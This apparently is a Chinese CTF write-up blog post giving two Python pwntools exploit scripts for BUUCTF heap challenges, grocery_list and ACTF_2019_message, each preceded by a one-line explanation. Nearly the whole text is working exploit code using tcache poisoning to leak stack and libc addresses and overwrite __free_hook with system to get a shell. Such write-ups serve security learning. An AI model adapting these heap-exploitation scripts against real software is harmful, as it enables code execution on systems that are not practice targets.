noxctf2018_grocery_list&&actf_2019_message

noxctf2018_grocery_list

先是观察函数发现有一个可以泄露栈地址然后通过tcache attack打到栈上泄露libcbase然后再次写入free_hook拿到shell
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./GroceryList')
p=remote('node3.buuoj.cn',26988)
elf=ELF('./GroceryList')
libc=elf.libc

sda=lambda data,data1:p.sendlineafter('%s'%(data),data1)
rec=lambda data:p.recvuntil(data)

def show():
	sda('Exit','1')

def add(sele,name):
	sda('Exit','2')
	sda('?',str(sele))
	sda(':',name)

def empadd(sele,man):
	sda('Exit','3')
	sda('?',str(sele))
	sda('?',str(man))

def delete(idx):
	sda('Exit','4')
	sda('?',str(idx))

def edit(idx,name):
	sda('Exit','5')
	sda('?',str(idx))
	sda(':',name)

def Tadd():
	sda('Exit','6')

add(2,'\x11'*4)#0
add(2,'\x12'*4)#1
Tadd()#2
add(2,'\x09'*9)#3
#Tadd()
show()
stack_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-11
log.success('stack_addr: '+hex(stack_addr))
delete(3)
payload=p64(0)*3+p64(0x41)+p64(stack_addr)
edit(2,payload)
add(2,'doudou')
empadd(2,1)
#Tadd()
#delete(2)
#show()
show()
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-231-libc.sym['__libc_start_main']
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add(3,'doudou')
delete(5)
payload=p64(0)*7+p64(0x71)+p64(free_hook)
edit(3,payload)
add(3,'/bin/sh\x00')
add(3,p64(system))
delete(5)
p.interactive()

actf_2019_message

没开PIE直接乱打一通~~
exp:

from pwn import *
#p=process('./ACTF_2019_message')
p=remote('node3.buuoj.cn',26585)
elf=ELF('./ACTF_2019_message')
libc=elf.libc
sd=lambda data:p.send(data)
sda=lambda data,data2:p.sendlineafter('%s'%(data),data2)
def add(size,content):
	sda(': ','1')
	sda(':',str(size))
	#sda(':',content)
	p.sendafter(':',content)

def delete(idx):
	sda(': ','2')
	sda(':',str(idx))

def edit(idx,content):
	sda(': ','3')
	sda(':',str(idx))
	#sda(':',content)
	p.sendafter(':',content)

def show(idx):
	sda(': ','4')
	sda(':',str(idx))

def exp():
	add(0x68,'\x09'*9)#0
	add(0x450,'\x08'*8)#1
	add(0x68,'/bin/sh\x00')#2
	add(0x58,'\x07'*7)#3
	delete(0)
	delete(0)
	delete(1)
	add(0x68,p64(0x000602060))
	add(0x68,'doudou')
	add(0x68,p64(0)*2+p64(0x460))
	show(1)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
	log.success('libcbase: '+hex(libcbase))
	system=libcbase+libc.sym['system']
	free_hook=libcbase+libc.sym['__free_hook']
	delete(3)
	delete(3)
	add(0x58,p64(free_hook))
	add(0x58,'doudou')
	add(0x58,p64(system))
	delete(2)
	#show(2)
	p.interactive()

if __name__=="__main__":
	exp()

你可能感兴趣的:(题目,BUUCTF)